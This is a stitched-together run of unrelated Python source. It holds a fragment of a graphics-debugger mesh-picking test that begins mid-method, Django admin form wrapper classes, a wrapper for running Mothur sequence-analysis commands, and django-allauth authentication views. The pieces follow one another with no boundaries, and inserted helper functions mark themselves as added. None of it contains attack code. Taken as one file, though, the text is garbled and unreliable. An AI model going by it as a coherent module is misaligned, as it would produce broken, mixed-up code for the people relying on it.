self.check_region((85, 70, 85, 125), lambda x: all([isredgreen(i) for i in x])) self.check_region((65, 100, 105, 100), lambda x: all([isredgreen(i) for i in x])) self.check_region((65, 55, 105, 55), lambda x: x == []) self.check_region((65, 125, 105, 125), lambda x: all([isredgreen(i) for i in x])) rdtest.log.success("Rendering of float2 color secondary in instance 0 is as expected") self.cfg.highlightVert = rd.MeshDisplay.NoHighlight inst1: rd.MeshFormat = self.controller.GetPostVSData(1, 0, self.cfg.type) self.cfg.curInstance = 1 self.cfg.second.vertexResourceId = self.cfg.position.vertexResourceId = inst1.vertexResourceId self.cfg.second.vertexByteOffset = self.cfg.position.vertexByteOffset = inst1.vertexByteOffset self.cfg.second.vertexByteOffset += 16 self.cfg.second.vertexByteOffset += 8 if pipe.HasAlignedPostVSData(self.cfg.type): self.cfg.second.vertexByteOffset += 8 self.cache_output() # The secondary color should be completely yellow self.check_region((85, 70, 85, 125), lambda x: all([isyellow(i) for i in x])) self.check_region((65, 100, 105, 100), lambda x: all([isyellow(i) for i in x])) # this line segment isn't in the first instance self.check_region((65, 55, 105, 55), lambda x: all([isyellow(i) for i in x])) # this line segment isn't in the second instance self.check_region((65, 125, 105, 125), lambda x: x == []) rdtest.log.success("Secondary rendering of instance 1 is as expected") # If we render from the float2 color we shouldn't get any blue self.cfg.second.vertexByteOffset = self.cfg.position.vertexByteOffset = inst1.vertexByteOffset self.cfg.second.vertexByteOffset += 16 self.cfg.second.format.compCount = 2 self.cache_output() # If we render from the float2 color we shouldn't get any blue since it's only a two-component value self.check_region((85, 70, 85, 125), lambda x: all([isredgreen(i) for i in x])) self.check_region((65, 100, 105, 100), lambda x: all([isredgreen(i) for i in x])) self.check_region((65, 55, 105, 55), lambda x: all([isredgreen(i) for i in x])) self.check_region((65, 125, 105, 125), lambda x: x == []) rdtest.log.success("Rendering of float2 color secondary in instance 1 is as expected") self.cfg.solidShadeMode = rd.SolidShade.NoSolid self.cfg.showAllInstances = True self.cache_output() # wireframe for original quad should still be present self.check_region((55, 95, 65, 95), lambda x: x != []) self.check_region((85, 60, 85, 70), lambda x: x != []) self.check_region((105, 100, 115, 100), lambda x: x != []) self.check_region((90, 130, 90, 140), lambda x: x != []) self.check_region((65, 120, 75, 120), lambda x: x != []) self.check_region((105, 70, 110, 70), lambda x: x != []) # But now we'll have an additional instance self.check_region((75, 55, 85, 55), lambda x: x != []) self.check_region((125, 85, 135, 85), lambda x: x != []) self.check_region((105, 110, 105, 120), lambda x: x != []) self.cfg.showWholePass = True self.cache_output() # same again self.check_region((55, 95, 65, 95), lambda x: x != []) self.check_region((85, 60, 85, 70), lambda x: x != []) self.check_region((105, 100, 115, 100), lambda x: x != []) self.check_region((90, 130, 90, 140), lambda x: x != []) self.check_region((65, 120, 75, 120), lambda x: x != []) self.check_region((105, 70, 110, 70), lambda x: x != []) self.check_region((75, 55, 85, 55), lambda x: x != []) self.check_region((125, 85, 135, 85), lambda x: x != []) self.check_region((105, 110, 105, 120), lambda x: x != []) # But now an extra previous action self.check_region((30, 105, 40, 105), lambda x: x != []) 
self.check_region((50, 80, 50, 90), lambda x: x != []) self.check_region((45, 130, 55, 130), lambda x: x != []) self.check_region((30, 150, 40, 150), lambda x: x != []) rdtest.log.success("Mesh rendering is as expected") self.cfg.showWholePass = False self.cfg.showAllInstances = False # Go back to instance 0. We can ignore cfg.second now self.cfg.curInstance = 0 self.cfg.position.vertexResourceId = inst0.vertexResourceId self.cfg.position.vertexByteOffset = inst0.vertexByteOffset self.cache_output() # Just above top-left, no result self.check_vertex(55, 60, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) # Just inside top-left, first vertex self.check_vertex(65, 70, (0, 0)) # Outside top-right, inside the second instance, but because we only have one instance showing should return # no result self.check_vertex(115, 60, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) self.check_vertex(80, 60, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) # In the first triangle near the top right self.check_vertex(105, 70, (1, 0)) # In the second triangle near the top right self.check_vertex(110, 70, (3, 0)) # In the second triangle near the middle, would be in the second instance self.check_vertex(95, 110, (4, 0)) # In the second triangle near the bottom right self.check_vertex(110, 130, (4, 0)) rdtest.log.success("Instance 0 picking is as expected") # if we look at only instance 1, the results should change self.cfg.curInstance = 1 self.cfg.position.vertexResourceId = inst1.vertexResourceId self.cfg.position.vertexByteOffset = inst1.vertexByteOffset self.cache_output() self.check_vertex(55, 60, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) self.check_vertex(65, 70, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) self.check_vertex(115, 60, (1, 1)) self.check_vertex(80, 60, (0, 1)) self.check_vertex(105, 70, (1, 1)) self.check_vertex(110, 70, (1, 1)) self.check_vertex(95, 110, (5, 1)) self.check_vertex(110, 130, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) rdtest.log.success("Instance 1 picking is as expected") # Now look at both instances together, this goes 'in order' so if there is overlap the first instance wins self.cfg.showAllInstances = True self.cache_output() self.check_vertex(55, 60, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) self.check_vertex(65, 70, (0, 0)) self.check_vertex(115, 60, (1, 1)) self.check_vertex(80, 60, (0, 1)) self.check_vertex(105, 70, (1, 0)) self.check_vertex(110, 70, (3, 0)) self.check_vertex(95, 110, (4, 0)) self.check_vertex(110, 130, (4, 0)) rdtest.log.success("Both instance picking is as expected") self.controller.SetFrameEvent(self.find_action("Points").next.eventId, False) # Only one instance, just check we can see the points self.cfg.curInstance = 0 self.cfg.position = self.controller.GetPostVSData(0, 0, self.cfg.type) self.cfg.position.nearPlane = 1.0 self.cfg.position.farPlane = 100.0 self.cache_output() # Picking points doesn't have any primitive, it should pick as long as it's close to the point self.check_vertex(55, 60, (0, 0)) self.check_vertex(65, 70, (0, 0)) self.check_vertex(105, 65, (1, 0)) self.check_vertex(115, 135, (2, 0)) self.check_vertex(65, 130, (3, 0)) self.check_vertex(60, 125, (3, 0)) rdtest.log.success("Point picking is as expected") self.controller.SetFrameEvent(self.find_action("Stride 0").next.eventId, False) self.cfg.position = self.controller.GetPostVSData(0, 0, self.cfg.type) self.cfg.position.nearPlane = 1.0 self.cfg.position.farPlane = 100.0 self.cache_output() # Stride of 0 is unusual 
but valid, ensure vertex picking still works
        self.check_vertex(55, 60, (0, 0))
        self.check_vertex(65, 70, (0, 0))
        self.check_vertex(105, 65, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult))
        self.check_vertex(115, 135, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult))
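# Worked example of the vertexByteOffset arithmetic used in check_capture() above.
# The assumed post-VS layout (taken from the comments in that method) is: float4
# position at offset 0, float2 Color2 right after it, float4 Color4 after that, with an
# optional 8-byte pad before Color4 when HasAlignedPostVSData() reports aligned data.
# This helper is ours, added only to make the offset bookkeeping explicit.
def _secondary_offset(base_offset, want_float2, aligned):
    offset = base_offset + 16      # skip the float4 position
    if want_float2:
        return offset              # float2 Color2 starts immediately after position
    offset += 8                    # skip the float2 Color2
    if aligned:
        offset += 8                # pad so float4 Color4 sits on a 16-byte boundary
    return offset                  # float4 Color4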
from __future__ import unicode_literals import json import warnings from django import forms from django.conf import settings from django.contrib.admin.utils import ( display_for_field, flatten_fieldsets, help_text_for_field, label_for_field, lookup_field, ) from django.core.exceptions import ObjectDoesNotExist from django.db.models.fields.related import ManyToManyRel from django.forms.utils import flatatt from django.template.defaultfilters import capfirst, linebreaksbr from django.utils import six from django.utils.deprecation import RemovedInDjango20Warning from django.utils.encoding import force_text from django.utils.html import conditional_escape, format_html from django.utils.safestring import mark_safe from django.utils.translation import ugettext, ugettext_lazy as _ ACTION_CHECKBOX_NAME = '_selected_action' class ActionForm(forms.Form): action = forms.ChoiceField(label=_('Action:')) select_across = forms.BooleanField( label='', required=False, initial=0, widget=forms.HiddenInput({'class': 'select-across'}), ) checkbox = forms.CheckboxInput({'class': 'action-select'}, lambda value: False) class AdminForm(object): def __init__(self, form, fieldsets, prepopulated_fields, readonly_fields=None, model_admin=None): self.form, self.fieldsets = form, fieldsets self.prepopulated_fields = [{ 'field': form[field_name], 'dependencies': [form[f] for f in dependencies] } for field_name, dependencies in prepopulated_fields.items()] self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields def __iter__(self): for name, options in self.fieldsets: yield Fieldset( self.form, name, readonly_fields=self.readonly_fields, model_admin=self.model_admin, **options ) @property def errors(self): return self.form.errors @property def non_field_errors(self): return self.form.non_field_errors @property def media(self): media = self.form.media for fs in self: media = media + fs.media return media class Fieldset(object): def __init__(self, form, name=None, readonly_fields=(), fields=(), classes=(), description=None, model_admin=None): self.form = form self.name, self.fields = name, fields self.classes = ' '.join(classes) self.description = description self.model_admin = model_admin self.readonly_fields = readonly_fields @property def media(self): if 'collapse' in self.classes: extra = '' if settings.DEBUG else '.min' js = [ 'vendor/jquery/jquery%s.js' % extra, 'jquery.init.js', 'collapse%s.js' % extra, ] return forms.Media(js=['admin/js/%s' % url for url in js]) return forms.Media() def __iter__(self): for field in self.fields: yield Fieldline(self.form, field, self.readonly_fields, model_admin=self.model_admin) class Fieldline(object): def __init__(self, form, field, readonly_fields=None, model_admin=None): self.form = form # A django.forms.Form instance if not hasattr(field, "__iter__") or isinstance(field, six.text_type): self.fields = [field] else: self.fields = field self.has_visible_field = not all( field in self.form.fields and self.form.fields[field].widget.is_hidden for field in self.fields ) self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields def __iter__(self): for i, field in enumerate(self.fields): if field in self.readonly_fields: yield AdminReadonlyField(self.form, field, is_first=(i == 0), model_admin=self.model_admin) else: yield AdminField(self.form, field, is_first=(i == 0)) def errors(self): return mark_safe( '\n'.join( self.form[f].errors.as_ul() for f in self.fields 
if f not in self.readonly_fields ).strip('\n') ) class AdminField(object): def __init__(self, form, field, is_first): self.field = form[field] # A django.forms.BoundField instance self.is_first = is_first # Whether this field is first on the line self.is_checkbox = isinstance(self.field.field.widget, forms.CheckboxInput) self.is_readonly = False def label_tag(self): classes = [] contents = conditional_escape(force_text(self.field.label)) if self.is_checkbox: classes.append('vCheckboxLabel') if self.field.field.required: classes.append('required') if not self.is_first: classes.append('inline') attrs = {'class': ' '.join(classes)} if classes else {} # checkboxes should not have a label suffix as the checkbox appears # to the left of the label. return self.field.label_tag( contents=mark_safe(contents), attrs=attrs, label_suffix='' if self.is_checkbox else None, ) def errors(self): return mark_safe(self.field.errors.as_ul()) class AdminReadonlyField(object): def __init__(self, form, field, is_first, model_admin=None): # Make self.field look a little bit like a field. This means that # {{ field.name }} must be a useful class name to identify the field. # For convenience, store other field-related data here too. if callable(field): class_name = field.__name__ if field.__name__ != '<lambda>' else '' else: class_name = field if form._meta.labels and class_name in form._meta.labels: label = form._meta.labels[class_name] else: label = label_for_field(field, form._meta.model, model_admin) if form._meta.help_texts and class_name in form._meta.help_texts: help_text = form._meta.help_texts[class_name] else: help_text = help_text_for_field(class_name, form._meta.model) self.field = { 'name': class_name, 'label': label, 'help_text': help_text, 'field': field, } self.form = form self.model_admin = model_admin self.is_first = is_first self.is_checkbox = False self.is_readonly = True self.empty_value_display = model_admin.get_empty_value_display() def label_tag(self): attrs = {} if not self.is_first: attrs["class"] = "inline" label = self.field['label'] return format_html('<label{}>{}:</label>', flatatt(attrs), capfirst(force_text(label))) def contents(self): from django.contrib.admin.templatetags.admin_list import _boolean_icon field, obj, model_admin = self.field['field'], self.form.instance, self.model_admin try: f, attr, value = lookup_field(field, obj, model_admin) except (AttributeError, ValueError, ObjectDoesNotExist): result_repr = self.empty_value_display else: if f is None: boolean = getattr(attr, "boolean", False) if boolean: result_repr = _boolean_icon(value) else: if hasattr(value, "__html__"): result_repr = value else: result_repr = force_text(value) if getattr(attr, "allow_tags", False): warnings.warn( "Deprecated allow_tags attribute used on %s. " "Use django.utils.html.format_html(), format_html_join(), " "or django.utils.safestring.mark_safe() instead." % attr, RemovedInDjango20Warning ) result_repr = mark_safe(value) else: result_repr = linebreaksbr(result_repr) else: if isinstance(f.remote_field, ManyToManyRel) and value is not None: result_repr = ", ".join(map(six.text_type, value.all())) else: result_repr = display_for_field(value, f, self.empty_value_display) result_repr = linebreaksbr(result_repr) return conditional_escape(result_repr) class InlineAdminFormSet(object): """ A wrapper around an inline formset for use in the admin system. 
""" def __init__(self, inline, formset, fieldsets, prepopulated_fields=None, readonly_fields=None, model_admin=None): self.opts = inline self.formset = formset self.fieldsets = fieldsets self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields if prepopulated_fields is None: prepopulated_fields = {} self.prepopulated_fields = prepopulated_fields self.classes = ' '.join(inline.classes) if inline.classes else '' def __iter__(self): for form, original in zip(self.formset.initial_forms, self.formset.get_queryset()): view_on_site_url = self.opts.get_view_on_site_url(original) yield InlineAdminForm( self.formset, form, self.fieldsets, self.prepopulated_fields, original, self.readonly_fields, model_admin=self.opts, view_on_site_url=view_on_site_url, ) for form in self.formset.extra_forms: yield InlineAdminForm( self.formset, form, self.fieldsets, self.prepopulated_fields, None, self.readonly_fields, model_admin=self.opts, ) yield InlineAdminForm( self.formset, self.formset.empty_form, self.fieldsets, self.prepopulated_fields, None, self.readonly_fields, model_admin=self.opts, ) def fields(self): fk = getattr(self.formset, "fk", None) for i, field_name in enumerate(flatten_fieldsets(self.fieldsets)): if fk and fk.name == field_name: continue if field_name in self.readonly_fields: yield { 'label': label_for_field(field_name, self.opts.model, self.opts), 'widget': {'is_hidden': False}, 'required': False, 'help_text': help_text_for_field(field_name, self.opts.model), } else: form_field = self.formset.empty_form.fields[field_name] label = form_field.label if label is None: label = label_for_field(field_name, self.opts.model, self.opts) yield { 'label': label, 'widget': form_field.widget, 'required': form_field.required, 'help_text': form_field.help_text, } def inline_formset_data(self): verbose_name = self.opts.verbose_name return json.dumps({ 'name': '#%s' % self.formset.prefix, 'options': { 'prefix': self.formset.prefix, 'addText': ugettext('Add another %(verbose_name)s') % { 'verbose_name': capfirst(verbose_name), }, 'deleteText': ugettext('Remove'), } }) @property def forms(self): return self.formset.forms @property def non_form_errors(self): return self.formset.non_form_errors @property def media(self): media = self.opts.media + self.formset.media for fs in self: media = media + fs.media return media class InlineAdminForm(AdminForm): """ A wrapper around an inline form for use in the admin system. """ def __init__(self, formset, form, fieldsets, prepopulated_fields, original, readonly_fields=None, model_admin=None, view_on_site_url=None): self.formset = formset self.model_admin = model_admin self.original = original self.show_url = original and view_on_site_url is not None self.absolute_url = view_on_site_url super(InlineAdminForm, self).__init__(form, fieldsets, prepopulated_fields, readonly_fields, model_admin) def __iter__(self): for name, options in self.fieldsets: yield InlineFieldset( self.formset, self.form, name, self.readonly_fields, model_admin=self.model_admin, **options ) def needs_explicit_pk_field(self): # Auto fields are editable (oddly), so need to check for auto or non-editable pk if self.form._meta.model._meta.has_auto_field or not self.form._meta.model._meta.pk.editable: return True # Also search any parents for an auto field. (The pk info is propagated to child # models so that does not need to be checked in parents.) 
for parent in self.form._meta.model._meta.get_parent_list(): if parent._meta.has_auto_field: return True return False def pk_field(self): return AdminField(self.form, self.formset._pk_field.name, False) def fk_field(self): fk = getattr(self.formset, "fk", None) if fk: return AdminField(self.form, fk.name, False) else: return "" def deletion_field(self): from django.forms.formsets import DELETION_FIELD_NAME return AdminField(self.form, DELETION_FIELD_NAME, False) def ordering_field(self): from django.forms.formsets import ORDERING_FIELD_NAME return AdminField(self.form, ORDERING_FIELD_NAME, False) class InlineFieldset(Fieldset): def __init__(self, formset, *args, **kwargs): self.formset = formset super(InlineFieldset, self).__init__(*args, **kwargs) def __iter__(self): fk = getattr(self.formset, "fk", None) for field in self.fields: if fk and fk.name == field: continue yield Fieldline(self.form, field, self.readonly_fields, model_admin=self.model_admin) class AdminErrorList(forms.utils.ErrorList): """ Stores all errors for the form/formsets in an add/change stage view. """ def __init__(self, form, inline_formsets): super(AdminErrorList, self).__init__() if form.is_bound: self.extend(form.errors.values()) for inline_formset in inline_formsets: self.extend(inline_formset.non_form_errors()) for errors_in_inline_form in inline_formset.errors: self.extend(errors_in_inline_form.values())
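# Minimal sketch of how these wrappers nest (AdminForm -> Fieldset -> Fieldline ->
# AdminField). The form class, field names and fieldset layout below are invented for
# illustration only -- they are not part of this module -- and the example avoids
# readonly fields so a plain forms.Form (already imported above) is enough.
class _ArticleForm(forms.Form):
    title = forms.CharField()
    slug = forms.SlugField()


def _admin_form_example():
    fieldsets = [(None, {'fields': ['title', 'slug'], 'classes': ['wide']})]
    admin_form = AdminForm(_ArticleForm(), fieldsets,
                           prepopulated_fields={'slug': ['title']})
    results = []
    for fieldset in admin_form:      # one Fieldset per (name, options) pair
        for line in fieldset:        # one Fieldline per entry in 'fields'
            for field in line:       # AdminField (or AdminReadonlyField)
                results.append((field.is_first, field.is_readonly))
    return results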
import logging
import subprocess

from pbrdna.utils import which, is_executable

log = logging.getLogger(__name__)

VALID_COMMANDS = frozenset(['fastq.info', 'align.seqs', 'chimera.uchime',
                            'screen.seqs', 'remove.seqs', 'filter.seqs',
                            'summary.seqs', 'dist.seqs', 'unique.seqs',
                            'trim.seqs', 'pre.cluster', 'cluster',
                            'set.logfile'])
NUMPROC_COMMANDS = frozenset(['align.seqs', 'chimera.uchime', 'screen.seqs',
                              'filter.seqs', 'dist.seqs'])
VALID_PARAMS = frozenset(['fasta', 'fastq', 'qfile', 'reference', 'name',
                          'flip', 'start', 'end', 'minlength', 'processors',
                          'vertical', 'trump', 'calc', 'output', 'phylip',
                          'method', 'accnos', 'countends', 'qaverage',
                          'diffs'])


class MothurCommand(object):
    """
    A class for representing individual Mothur Commands
    """

    def __init__(self, command, parameters):
        # Validate the selected Mothur Command
        try:
            assert command.lower() in VALID_COMMANDS
            self._command = command.lower()
        except AssertionError:
            raise ValueError("Invalid Mothur command")
        # Validate the arguments for the command
        self._parameters = {}
        for param, value in parameters.iteritems():
            try:
                assert param in VALID_PARAMS
                self.parameters[param] = value
            except AssertionError:
                raise ValueError('Invalid Mothur argument')

    @property
    def command(self):
        return self._command

    @property
    def parameters(self):
        return self._parameters

    @property
    def parameterString(self):
        return ", ".join(["%s=%s" % (p, v)
                          for p, v in self.parameters.iteritems()
                          if v is not None])

    def __str__(self):
        return "%s(%s)" % (self.command, self.parameterString)


class MothurJob(object):
    """
    A class for representing Mothur calls of 1-or-more commands
    """

    def __init__(self, mothurExe, commands, stdout=None, stderr=None):
        # Validate the supplied Mothur executable
        try:
            assert is_executable(mothurExe)
            self._mothur = mothurExe
        except AssertionError:
            raise ValueError("Mothur executable is not valid!")
        # Validate the supplied Mothur commands
        self._commands = []
        for command in commands:
            try:
                assert isinstance(command, MothurCommand)
                self._commands.append(command)
            except AssertionError:
                raise ValueError("Argument is not a MothurCommand!")
        self.stdout = stdout
        self.stderr = stderr

    @property
    def mothur(self):
        return self._mothur

    @property
    def commands(self):
        return self._commands

    @property
    def commandString(self):
        return "; ".join(map(str, self.commands))

    @property
    def callString(self):
        return '#%s' % self.commandString

    @property
    def displayString(self):
        return '\n\t%s\n\t\t%s' % (self.mothur,
                                   "\n\t\t".join(map(str, self.commands)))

    def __str__(self):
        return '%s "%s"' % (self.mothur, self.callString)

    def __call__(self):
        log.info('Executing the following command: %s' % self.displayString)
        p = subprocess.Popen([self.mothur, self.callString],
                             stdout=self.stdout,
                             stderr=self.stderr)
        stdout, stderr = p.communicate()
        log.info('Mothur command exited successfully')


class MothurRunner(object):
    """
    A Factory-style tool for creating run-able MothurCommand objects
    """

    #####################
    # Variable Defaults #
    #####################

    NUM_PROC = 1

    ##########################
    # Initialization Methods #
    ##########################

    def __init__(self, mothurExe=None, numProc=None, stdout=None, stderr=None):
        if mothurExe is None:
            self.initializeFromArgs()
        else:
            self.initializeFromCall(mothurExe, numProc, stdout, stderr)
        self.validateSettings()

    def initializeFromArgs(self):
        import argparse
        desc = 'A tool for calling Mothur commands from Python'
        parser = argparse.ArgumentParser(description=desc)
        parser.add_argument('-n', '--num_processes', type=int,
                            metavar='INT', dest='numProc',
                            default=self.NUM_PROC,
                            help="Number of processors to use")
        parser.add_argument('--mothur', metavar='MOTHUR_PATH', dest='mothurExe',
                            help="Specify the path to the Mothur executable")
        parser.add_argument('--stdout', metavar='OUT',
                            type=argparse.FileType('a'),
                            help="Pipe Mothur's STDOUT to specified file")
        parser.add_argument('--stderr', metavar='ERR',
                            type=argparse.FileType('a'),
                            help="Pipe Mothur's STDERR to specified file")
        parser.add_argument('--debug', action='store_true',
                            help="Turn on DEBUG message logging")
        args = parser.parse_args()
        self.__dict__.update(vars(args))

    def initializeFromCall(self, mothurExe, numProc, stdout, stderr):
        self.mothurExe = mothurExe
        self.numProc = numProc
        # Set the output handle for STDOUT
        if stdout is None:
            self.stdout = None
        else:
            self.stdout = open(stdout, 'a')
        # Set the output handle for STDERR
        if stderr is None:
            self.stderr = None
        else:
            self.stderr = open(stderr, 'a')

    def validateSettings(self):
        # Search for Mothur executable if not supplied
        if self.mothurExe is None:
            self.mothur = which('mothur')
            if self.mothur is None:
                raise OSError('Mothur executable not found!')
        # If an argument was given, check that it's executable
        elif is_executable(self.mothurExe):
            self.mothur = self.mothurExe
        else:
            raise OSError('Supplied Mothur executable not valid!')
        # Validate the Num_Processes argument
        try:
            assert self.numProc >= 1
        except AssertionError:
            raise ValueError("Number of processes must be >= 1!")
        self.numProc = str(self.numProc)

    ####################
    # Instance Methods #
    ####################

    def createJob(self, command, parameters, logFile=None):
        commands = []
        log.info('Creating a MothurCommand for "%s"' % command)
        # Check the logFile and create it if needed
        if logFile is None:
            log.info('No log-file specified for this job')
        else:
            log.info('Setting the log-file to "%s"' % logFile)
            logParams = {'name': logFile}
            logCommand = MothurCommand('set.logfile', logParams)
            commands.append(logCommand)
        parameters = self.addDefaultParameters(command, parameters)
        mainCommand = MothurCommand(command, parameters)
        commands.append(mainCommand)
        return MothurJob(self.mothur, commands, self.stdout, self.stderr)

    def addDefaultParameters(self, command, parameters):
        log.info('Checking default parameters for "%s"' % command)
        if command in NUMPROC_COMMANDS and 'processors' not in parameters:
            log.info('Adding default value from "numProc" for "processors"')
            parameters['processors'] = str(self.numProc)
        return parameters

    def runJob(self, command, parameters, logFile=None):
        job = self.createJob(command, parameters, logFile)
        job()


if __name__ == '__main__':
    mcm = MothurRunner()
    print "MothurRunner Created"
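# Sketch of intended usage, based on the classes above. The executable path and the
# fasta/reference/log file names are placeholders, not real data, and the function is
# defined but never called.
def _example_alignment_job():
    runner = MothurRunner(mothurExe='/usr/bin/mothur', numProc=4)
    # Builds and executes roughly:
    #   mothur "#set.logfile(name=align.log); align.seqs(fasta=reads.fasta,
    #           reference=reference.fasta, processors=4)"
    runner.runJob('align.seqs',
                  {'fasta': 'reads.fasta', 'reference': 'reference.fasta'},
                  logFile='align.log')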
from django.core.urlresolvers import reverse, reverse_lazy from django.http import (HttpResponseRedirect, Http404, HttpResponsePermanentRedirect) from django.views.generic.base import TemplateResponseMixin, View, TemplateView from django.views.generic.edit import FormView from django.contrib import messages from django.contrib.auth.decorators import login_required from django.contrib.auth import logout as auth_logout from django.shortcuts import redirect from django.views.decorators.debug import sensitive_post_parameters from django.utils.decorators import method_decorator from ..exceptions import ImmediateHttpResponse from ..utils import get_form_class, get_request_param, get_current_site from .utils import (get_next_redirect_url, complete_signup, get_login_redirect_url, perform_login, passthrough_next_redirect_url, url_str_to_user_pk) from .forms import ( AddEmailForm, ChangePasswordForm, LoginForm, ResetPasswordKeyForm, ResetPasswordForm, SetPasswordForm, SignupForm, UserTokenForm) from .utils import sync_user_email_addresses from .models import EmailAddress, EmailConfirmation from . import signals from . import app_settings from .adapter import get_adapter try: from django.contrib.auth import update_session_auth_hash except ImportError: update_session_auth_hash = None sensitive_post_parameters_m = method_decorator( sensitive_post_parameters('password', 'password1', 'password2')) def _ajax_response(request, response, form=None): if request.is_ajax(): if (isinstance(response, HttpResponseRedirect) or isinstance(response, HttpResponsePermanentRedirect)): redirect_to = response['Location'] else: redirect_to = None response = get_adapter().ajax_response(request, response, form=form, redirect_to=redirect_to) return response class RedirectAuthenticatedUserMixin(object): def dispatch(self, request, *args, **kwargs): # WORKAROUND: https://code.djangoproject.com/ticket/19316 self.request = request # (end WORKAROUND) if request.user.is_authenticated(): redirect_to = self.get_authenticated_redirect_url() response = HttpResponseRedirect(redirect_to) return _ajax_response(request, response) else: response = super(RedirectAuthenticatedUserMixin, self).dispatch(request, *args, **kwargs) return response def get_authenticated_redirect_url(self): redirect_field_name = self.redirect_field_name return get_login_redirect_url(self.request, url=self.get_success_url(), redirect_field_name=redirect_field_name) class AjaxCapableProcessFormViewMixin(object): def post(self, request, *args, **kwargs): form_class = self.get_form_class() form = self.get_form(form_class) if form.is_valid(): response = self.form_valid(form) else: response = self.form_invalid(form) return _ajax_response(self.request, response, form=form) class LoginView(RedirectAuthenticatedUserMixin, AjaxCapableProcessFormViewMixin, FormView): form_class = LoginForm template_name = "account/login.html" success_url = None redirect_field_name = "next" @sensitive_post_parameters_m def dispatch(self, request, *args, **kwargs): return super(LoginView, self).dispatch(request, *args, **kwargs) def get_form_class(self): return get_form_class(app_settings.FORMS, 'login', self.form_class) def form_valid(self, form): success_url = self.get_success_url() try: return form.login(self.request, redirect_url=success_url) except ImmediateHttpResponse as e: return e.response def get_success_url(self): # Explicitly passed ?next= URL takes precedence ret = (get_next_redirect_url(self.request, self.redirect_field_name) or self.success_url) return ret def 
get_context_data(self, **kwargs): ret = super(LoginView, self).get_context_data(**kwargs) signup_url = passthrough_next_redirect_url(self.request, reverse("account_signup"), self.redirect_field_name) redirect_field_value = get_request_param(self.request, self.redirect_field_name) site = get_current_site(self.request) ret.update({"signup_url": signup_url, "site": site, "redirect_field_name": self.redirect_field_name, "redirect_field_value": redirect_field_value}) return ret login = LoginView.as_view() class CloseableSignupMixin(object): template_name_signup_closed = "account/signup_closed.html" def dispatch(self, request, *args, **kwargs): # WORKAROUND: https://code.djangoproject.com/ticket/19316 self.request = request # (end WORKAROUND) try: if not self.is_open(): return self.closed() except ImmediateHttpResponse as e: return e.response return super(CloseableSignupMixin, self).dispatch(request, *args, **kwargs) def is_open(self): return get_adapter().is_open_for_signup(self.request) def closed(self): response_kwargs = { "request": self.request, "template": self.template_name_signup_closed, } return self.response_class(**response_kwargs) class SignupView(RedirectAuthenticatedUserMixin, CloseableSignupMixin, AjaxCapableProcessFormViewMixin, FormView): template_name = "account/signup.html" form_class = SignupForm redirect_field_name = "next" success_url = None @sensitive_post_parameters_m def dispatch(self, request, *args, **kwargs): return super(SignupView, self).dispatch(request, *args, **kwargs) def get_form_class(self): return get_form_class(app_settings.FORMS, 'signup', self.form_class) def get_success_url(self): # Explicitly passed ?next= URL takes precedence ret = (get_next_redirect_url(self.request, self.redirect_field_name) or self.success_url) return ret def form_valid(self, form): user = form.save(self.request) return complete_signup(self.request, user, app_settings.EMAIL_VERIFICATION, self.get_success_url()) def get_context_data(self, **kwargs): form = kwargs['form'] form.fields["email"].initial = self.request.session \ .get('account_verified_email', None) ret = super(SignupView, self).get_context_data(**kwargs) login_url = passthrough_next_redirect_url(self.request, reverse("account_login"), self.redirect_field_name) redirect_field_name = self.redirect_field_name redirect_field_value = get_request_param(self.request, redirect_field_name) ret.update({"login_url": login_url, "redirect_field_name": redirect_field_name, "redirect_field_value": redirect_field_value}) return ret signup = SignupView.as_view() class ConfirmEmailView(TemplateResponseMixin, View): def get_template_names(self): if self.request.method == 'POST': return ["account/email_confirmed.html"] else: return ["account/email_confirm.html"] def get(self, *args, **kwargs): try: self.object = self.get_object() if app_settings.CONFIRM_EMAIL_ON_GET: return self.post(*args, **kwargs) except Http404: self.object = None ctx = self.get_context_data() return self.render_to_response(ctx) def post(self, *args, **kwargs): self.object = confirmation = self.get_object() confirmation.confirm(self.request) get_adapter().add_message(self.request, messages.SUCCESS, 'account/messages/email_confirmed.txt', {'email': confirmation.email_address.email}) if app_settings.LOGIN_ON_EMAIL_CONFIRMATION: resp = self.login_on_confirm(confirmation) if resp is not None: return resp # Don't -- allauth doesn't touch is_active so that sys admin can # use it to block users et al # # user = confirmation.email_address.user # user.is_active = True # 
user.save() redirect_url = self.get_redirect_url() if not redirect_url: ctx = self.get_context_data() return self.render_to_response(ctx) return redirect(redirect_url) def login_on_confirm(self, confirmation): """ Simply logging in the user may become a security issue. If you do not take proper care (e.g. don't purge used email confirmations), a malicious person that got hold of the link will be able to login over and over again and the user is unable to do anything about it. Even restoring their own mailbox security will not help, as the links will still work. For password reset this is different, this mechanism works only as long as the attacker has access to the mailbox. If they no longer has access they cannot issue a password request and intercept it. Furthermore, all places where the links are listed (log files, but even Google Analytics) all of a sudden need to be secured. Purging the email confirmation once confirmed changes the behavior -- users will not be able to repeatedly confirm (in case they forgot that they already clicked the mail). All in all, opted for storing the user that is in the process of signing up in the session to avoid all of the above. This may not 100% work in case the user closes the browser (and the session gets lost), but at least we're secure. """ user_pk = None user_pk_str = self.request.session.pop('account_user', None) if user_pk_str: user_pk = url_str_to_user_pk(user_pk_str) user = confirmation.email_address.user if user_pk == user.pk and self.request.user.is_anonymous(): return perform_login(self.request, user, app_settings.EmailVerificationMethod.NONE, # passed as callable, as this method # depends on the authenticated state redirect_url=self.get_redirect_url) return None def get_object(self, queryset=None): if queryset is None: queryset = self.get_queryset() try: return queryset.get(key=self.kwargs["key"].lower()) except EmailConfirmation.DoesNotExist: raise Http404() def get_queryset(self): qs = EmailConfirmation.objects.all_valid() qs = qs.select_related("email_address__user") return qs def get_context_data(self, **kwargs): ctx = kwargs ctx["confirmation"] = self.object return ctx def get_redirect_url(self): return get_adapter().get_email_confirmation_redirect_url(self.request) 